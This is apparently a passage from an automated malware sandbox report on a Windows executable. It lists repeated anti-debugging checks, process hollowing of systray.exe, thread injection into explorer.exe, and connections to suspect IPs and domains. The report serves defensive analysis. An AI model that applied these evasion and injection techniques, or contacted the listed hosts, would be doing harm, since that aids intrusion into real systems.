          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0115B260 mov eax, dword ptr fs:[00000030h]3_2_0115B260
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0115B260 mov eax, dword ptr fs:[00000030h]3_2_0115B260
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01178A62 mov eax, dword ptr fs:[00000030h]3_2_01178A62
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010DD294 mov eax, dword ptr fs:[00000030h]3_2_010DD294
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010DD294 mov eax, dword ptr fs:[00000030h]3_2_010DD294
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010A52A5 mov eax, dword ptr fs:[00000030h]3_2_010A52A5
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010A52A5 mov eax, dword ptr fs:[00000030h]3_2_010A52A5
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010A52A5 mov eax, dword ptr fs:[00000030h]3_2_010A52A5
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010A52A5 mov eax, dword ptr fs:[00000030h]3_2_010A52A5
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010A52A5 mov eax, dword ptr fs:[00000030h]3_2_010A52A5
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010BAAB0 mov eax, dword ptr fs:[00000030h]3_2_010BAAB0
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010BAAB0 mov eax, dword ptr fs:[00000030h]3_2_010BAAB0
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010DFAB0 mov eax, dword ptr fs:[00000030h]3_2_010DFAB0
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010D2ACB mov eax, dword ptr fs:[00000030h]3_2_010D2ACB
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010D2AE4 mov eax, dword ptr fs:[00000030h]3_2_010D2AE4
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01164AEF mov eax, dword ptr fs:[00000030h]3_2_01164AEF
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01164AEF mov eax, dword ptr fs:[00000030h]3_2_01164AEF
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01164AEF mov eax, dword ptr fs:[00000030h]3_2_01164AEF
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01164AEF mov eax, dword ptr fs:[00000030h]3_2_01164AEF
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01164AEF mov eax, dword ptr fs:[00000030h]3_2_01164AEF
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01164AEF mov eax, dword ptr fs:[00000030h]3_2_01164AEF
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01164AEF mov eax, dword ptr fs:[00000030h]3_2_01164AEF
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01164AEF mov eax, dword ptr fs:[00000030h]3_2_01164AEF
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01164AEF mov eax, dword ptr fs:[00000030h]3_2_01164AEF
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01164AEF mov eax, dword ptr fs:[00000030h]3_2_01164AEF
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01164AEF mov eax, dword ptr fs:[00000030h]3_2_01164AEF
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01164AEF mov eax, dword ptr fs:[00000030h]3_2_01164AEF
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01164AEF mov eax, dword ptr fs:[00000030h]3_2_01164AEF
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01164AEF mov eax, dword ptr fs:[00000030h]3_2_01164AEF
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01178D34 mov eax, dword ptr fs:[00000030h]3_2_01178D34
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0112A537 mov eax, dword ptr fs:[00000030h]3_2_0112A537
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0116E539 mov eax, dword ptr fs:[00000030h]3_2_0116E539
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010D4D3B mov eax, dword ptr fs:[00000030h]3_2_010D4D3B
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010D4D3B mov eax, dword ptr fs:[00000030h]3_2_010D4D3B
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010D4D3B mov eax, dword ptr fs:[00000030h]3_2_010D4D3B
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010AAD30 mov eax, dword ptr fs:[00000030h]3_2_010AAD30
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010B3D34 mov eax, dword ptr fs:[00000030h]3_2_010B3D34
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010B3D34 mov eax, dword ptr fs:[00000030h]3_2_010B3D34
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010B3D34 mov eax, dword ptr fs:[00000030h]3_2_010B3D34
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010B3D34 mov eax, dword ptr fs:[00000030h]3_2_010B3D34
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010B3D34 mov eax, dword ptr fs:[00000030h]3_2_010B3D34
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010B3D34 mov eax, dword ptr fs:[00000030h]3_2_010B3D34
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010B3D34 mov eax, dword ptr fs:[00000030h]3_2_010B3D34
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010B3D34 mov eax, dword ptr fs:[00000030h]3_2_010B3D34
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010B3D34 mov eax, dword ptr fs:[00000030h]3_2_010B3D34
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010B3D34 mov eax, dword ptr fs:[00000030h]3_2_010B3D34
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010B3D34 mov eax, dword ptr fs:[00000030h]3_2_010B3D34
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010B3D34 mov eax, dword ptr fs:[00000030h]3_2_010B3D34
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010B3D34 mov eax, dword ptr fs:[00000030h]3_2_010B3D34
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010E3D43 mov eax, dword ptr fs:[00000030h]3_2_010E3D43
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01123540 mov eax, dword ptr fs:[00000030h]3_2_01123540
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01153D40 mov eax, dword ptr fs:[00000030h]3_2_01153D40
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010C7D50 mov eax, dword ptr fs:[00000030h]3_2_010C7D50
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010CC577 mov eax, dword ptr fs:[00000030h]3_2_010CC577
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010CC577 mov eax, dword ptr fs:[00000030h]3_2_010CC577
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010A2D8A mov eax, dword ptr fs:[00000030h]3_2_010A2D8A
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010A2D8A mov eax, dword ptr fs:[00000030h]3_2_010A2D8A
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010A2D8A mov eax, dword ptr fs:[00000030h]3_2_010A2D8A
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010A2D8A mov eax, dword ptr fs:[00000030h]3_2_010A2D8A
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010A2D8A mov eax, dword ptr fs:[00000030h]3_2_010A2D8A
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010D2581 mov eax, dword ptr fs:[00000030h]3_2_010D2581
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010D2581 mov eax, dword ptr fs:[00000030h]3_2_010D2581
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010D2581 mov eax, dword ptr fs:[00000030h]3_2_010D2581
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010D2581 mov eax, dword ptr fs:[00000030h]3_2_010D2581
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010DFD9B mov eax, dword ptr fs:[00000030h]3_2_010DFD9B
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010DFD9B mov eax, dword ptr fs:[00000030h]3_2_010DFD9B
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010D35A1 mov eax, dword ptr fs:[00000030h]3_2_010D35A1
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010D1DB5 mov eax, dword ptr fs:[00000030h]3_2_010D1DB5
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010D1DB5 mov eax, dword ptr fs:[00000030h]3_2_010D1DB5
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010D1DB5 mov eax, dword ptr fs:[00000030h]3_2_010D1DB5
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_011705AC mov eax, dword ptr fs:[00000030h]3_2_011705AC
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_011705AC mov eax, dword ptr fs:[00000030h]3_2_011705AC
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01126DC9 mov eax, dword ptr fs:[00000030h]3_2_01126DC9
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01126DC9 mov eax, dword ptr fs:[00000030h]3_2_01126DC9
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01126DC9 mov eax, dword ptr fs:[00000030h]3_2_01126DC9
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01126DC9 mov ecx, dword ptr fs:[00000030h]3_2_01126DC9
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01126DC9 mov eax, dword ptr fs:[00000030h]3_2_01126DC9
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01126DC9 mov eax, dword ptr fs:[00000030h]3_2_01126DC9
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01158DF1 mov eax, dword ptr fs:[00000030h]3_2_01158DF1
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010BD5E0 mov eax, dword ptr fs:[00000030h]3_2_010BD5E0
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010BD5E0 mov eax, dword ptr fs:[00000030h]3_2_010BD5E0
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0116FDE2 mov eax, dword ptr fs:[00000030h]3_2_0116FDE2
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0116FDE2 mov eax, dword ptr fs:[00000030h]3_2_0116FDE2
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0116FDE2 mov eax, dword ptr fs:[00000030h]3_2_0116FDE2
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0116FDE2 mov eax, dword ptr fs:[00000030h]3_2_0116FDE2
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01161C06 mov eax, dword ptr fs:[00000030h]3_2_01161C06
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01161C06 mov eax, dword ptr fs:[00000030h]3_2_01161C06
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01161C06 mov eax, dword ptr fs:[00000030h]3_2_01161C06
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01161C06 mov eax, dword ptr fs:[00000030h]3_2_01161C06
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01161C06 mov eax, dword ptr fs:[00000030h]3_2_01161C06
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01161C06 mov eax, dword ptr fs:[00000030h]3_2_01161C06
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01161C06 mov eax, dword ptr fs:[00000030h]3_2_01161C06
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01161C06 mov eax, dword ptr fs:[00000030h]3_2_01161C06
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01161C06 mov eax, dword ptr fs:[00000030h]3_2_01161C06
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01161C06 mov eax, dword ptr fs:[00000030h]3_2_01161C06
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01161C06 mov eax, dword ptr fs:[00000030h]3_2_01161C06
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01161C06 mov eax, dword ptr fs:[00000030h]3_2_01161C06
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01161C06 mov eax, dword ptr fs:[00000030h]3_2_01161C06
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01161C06 mov eax, dword ptr fs:[00000030h]3_2_01161C06
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01126C0A mov eax, dword ptr fs:[00000030h]3_2_01126C0A
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01126C0A mov eax, dword ptr fs:[00000030h]3_2_01126C0A
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01126C0A mov eax, dword ptr fs:[00000030h]3_2_01126C0A
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01126C0A mov eax, dword ptr fs:[00000030h]3_2_01126C0A
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0117740D mov eax, dword ptr fs:[00000030h]3_2_0117740D
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0117740D mov eax, dword ptr fs:[00000030h]3_2_0117740D
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0117740D mov eax, dword ptr fs:[00000030h]3_2_0117740D
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010DBC2C mov eax, dword ptr fs:[00000030h]3_2_010DBC2C
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0113C450 mov eax, dword ptr fs:[00000030h]3_2_0113C450
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0113C450 mov eax, dword ptr fs:[00000030h]3_2_0113C450
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010DA44B mov eax, dword ptr fs:[00000030h]3_2_010DA44B
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010C746D mov eax, dword ptr fs:[00000030h]3_2_010C746D
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010DAC7B mov eax, dword ptr fs:[00000030h]3_2_010DAC7B
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010DAC7B mov eax, dword ptr fs:[00000030h]3_2_010DAC7B
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010DAC7B mov eax, dword ptr fs:[00000030h]3_2_010DAC7B
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010DAC7B mov eax, dword ptr fs:[00000030h]3_2_010DAC7B
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010DAC7B mov eax, dword ptr fs:[00000030h]3_2_010DAC7B
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010DAC7B mov eax, dword ptr fs:[00000030h]3_2_010DAC7B
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010DAC7B mov eax, dword ptr fs:[00000030h]3_2_010DAC7B
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010DAC7B mov eax, dword ptr fs:[00000030h]3_2_010DAC7B
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010DAC7B mov eax, dword ptr fs:[00000030h]3_2_010DAC7B
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010DAC7B mov eax, dword ptr fs:[00000030h]3_2_010DAC7B
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010DAC7B mov eax, dword ptr fs:[00000030h]3_2_010DAC7B
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01164496 mov eax, dword ptr fs:[00000030h]3_2_01164496
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01164496 mov eax, dword ptr fs:[00000030h]3_2_01164496
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01164496 mov eax, dword ptr fs:[00000030h]3_2_01164496
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01164496 mov eax, dword ptr fs:[00000030h]3_2_01164496
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01164496 mov eax, dword ptr fs:[00000030h]3_2_01164496
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01164496 mov eax, dword ptr fs:[00000030h]3_2_01164496
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01164496 mov eax, dword ptr fs:[00000030h]3_2_01164496
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01164496 mov eax, dword ptr fs:[00000030h]3_2_01164496
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01164496 mov eax, dword ptr fs:[00000030h]3_2_01164496
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01164496 mov eax, dword ptr fs:[00000030h]3_2_01164496
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01164496 mov eax, dword ptr fs:[00000030h]3_2_01164496
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01164496 mov eax, dword ptr fs:[00000030h]3_2_01164496
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01164496 mov eax, dword ptr fs:[00000030h]3_2_01164496
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010B849B mov eax, dword ptr fs:[00000030h]3_2_010B849B
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01178CD6 mov eax, dword ptr fs:[00000030h]3_2_01178CD6
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01126CF0 mov eax, dword ptr fs:[00000030h]3_2_01126CF0
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01126CF0 mov eax, dword ptr fs:[00000030h]3_2_01126CF0
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01126CF0 mov eax, dword ptr fs:[00000030h]3_2_01126CF0
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_011614FB mov eax, dword ptr fs:[00000030h]3_2_011614FB
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0113FF10 mov eax, dword ptr fs:[00000030h]3_2_0113FF10
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0113FF10 mov eax, dword ptr fs:[00000030h]3_2_0113FF10
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010DA70E mov eax, dword ptr fs:[00000030h]3_2_010DA70E
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010DA70E mov eax, dword ptr fs:[00000030h]3_2_010DA70E
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0117070D mov eax, dword ptr fs:[00000030h]3_2_0117070D
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0117070D mov eax, dword ptr fs:[00000030h]3_2_0117070D
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010CF716 mov eax, dword ptr fs:[00000030h]3_2_010CF716
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010A4F2E mov eax, dword ptr fs:[00000030h]3_2_010A4F2E
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010A4F2E mov eax, dword ptr fs:[00000030h]3_2_010A4F2E
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010CB73D mov eax, dword ptr fs:[00000030h]3_2_010CB73D
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010CB73D mov eax, dword ptr fs:[00000030h]3_2_010CB73D
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010DE730 mov eax, dword ptr fs:[00000030h]3_2_010DE730
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010BEF40 mov eax, dword ptr fs:[00000030h]3_2_010BEF40
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010BFF60 mov eax, dword ptr fs:[00000030h]3_2_010BFF60
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01178F6A mov eax, dword ptr fs:[00000030h]3_2_01178F6A
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01127794 mov eax, dword ptr fs:[00000030h]3_2_01127794
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01127794 mov eax, dword ptr fs:[00000030h]3_2_01127794
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01127794 mov eax, dword ptr fs:[00000030h]3_2_01127794
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010B8794 mov eax, dword ptr fs:[00000030h]3_2_010B8794
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010E37F5 mov eax, dword ptr fs:[00000030h]3_2_010E37F5
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010AC600 mov eax, dword ptr fs:[00000030h]3_2_010AC600
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010AC600 mov eax, dword ptr fs:[00000030h]3_2_010AC600
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010AC600 mov eax, dword ptr fs:[00000030h]3_2_010AC600
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010D8E00 mov eax, dword ptr fs:[00000030h]3_2_010D8E00
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010DA61C mov eax, dword ptr fs:[00000030h]3_2_010DA61C
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010DA61C mov eax, dword ptr fs:[00000030h]3_2_010DA61C
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01161608 mov eax, dword ptr fs:[00000030h]3_2_01161608
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0115FE3F mov eax, dword ptr fs:[00000030h]3_2_0115FE3F
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010AE620 mov eax, dword ptr fs:[00000030h]3_2_010AE620
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010B7E41 mov eax, dword ptr fs:[00000030h]3_2_010B7E41
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010B7E41 mov eax, dword ptr fs:[00000030h]3_2_010B7E41
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010B7E41 mov eax, dword ptr fs:[00000030h]3_2_010B7E41
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010B7E41 mov eax, dword ptr fs:[00000030h]3_2_010B7E41
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010B7E41 mov eax, dword ptr fs:[00000030h]3_2_010B7E41
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010B7E41 mov eax, dword ptr fs:[00000030h]3_2_010B7E41
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0116AE44 mov eax, dword ptr fs:[00000030h]3_2_0116AE44
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0116AE44 mov eax, dword ptr fs:[00000030h]3_2_0116AE44
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010B766D mov eax, dword ptr fs:[00000030h]3_2_010B766D
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010CAE73 mov eax, dword ptr fs:[00000030h]3_2_010CAE73
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010CAE73 mov eax, dword ptr fs:[00000030h]3_2_010CAE73
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010CAE73 mov eax, dword ptr fs:[00000030h]3_2_010CAE73
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010CAE73 mov eax, dword ptr fs:[00000030h]3_2_010CAE73
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010CAE73 mov eax, dword ptr fs:[00000030h]3_2_010CAE73
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0113FE87 mov eax, dword ptr fs:[00000030h]3_2_0113FE87
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01170EA5 mov eax, dword ptr fs:[00000030h]3_2_01170EA5
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01170EA5 mov eax, dword ptr fs:[00000030h]3_2_01170EA5
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01170EA5 mov eax, dword ptr fs:[00000030h]3_2_01170EA5
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_011246A7 mov eax, dword ptr fs:[00000030h]3_2_011246A7
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01178ED6 mov eax, dword ptr fs:[00000030h]3_2_01178ED6
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010D36CC mov eax, dword ptr fs:[00000030h]3_2_010D36CC
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010E8EC7 mov eax, dword ptr fs:[00000030h]3_2_010E8EC7
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0115FEC0 mov eax, dword ptr fs:[00000030h]3_2_0115FEC0
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010B76E2 mov eax, dword ptr fs:[00000030h]3_2_010B76E2
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010D16E0 mov ecx, dword ptr fs:[00000030h]3_2_010D16E0
          Source: C:\Users\user\Desktop\535276_86376.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0040CF03 LdrLoadDll,3_2_0040CF03
          Source: C:\Users\user\Desktop\535276_86376.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 130.185.109.77 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.berlinhealthweek.com
          Source: C:\Windows\explorer.exeDomain query: www.gomarketing.info
          Source: C:\Windows\explorer.exeDomain query: www.antalyabfe.com
          Source: C:\Windows\explorer.exeDomain query: www.rt66omm.com
          Source: C:\Windows\explorer.exeNetwork Connect: 188.114.97.7 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 81.169.145.93 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 198.177.124.57 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.musicandgros.com
          Source: C:\Windows\explorer.exeNetwork Connect: 118.27.125.172 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.jhg61.com
          Source: C:\Windows\explorer.exeNetwork Connect: 183.90.228.46 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 150.129.40.9 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.haynicorpon.biz
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\535276_86376.exeSection unmapped: C:\Windows\SysWOW64\systray.exe base address: C10000Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\535276_86376.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeSection loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeSection loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\535276_86376.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\535276_86376.exeThread register set: target process: 3324Jump to behavior
          Source: C:\Windows\SysWOW64\systray.exeThread register set: target process: 3324Jump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeProcess created: C:\Users\user\Desktop\535276_86376.exe C:\Users\user\Desktop\535276_86376.exeJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeProcess created: C:\Users\user\Desktop\535276_86376.exe C:\Users\user\Desktop\535276_86376.exeJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeProcess created: C:\Users\user\Desktop\535276_86376.exe C:\Users\user\Desktop\535276_86376.exeJump to behavior
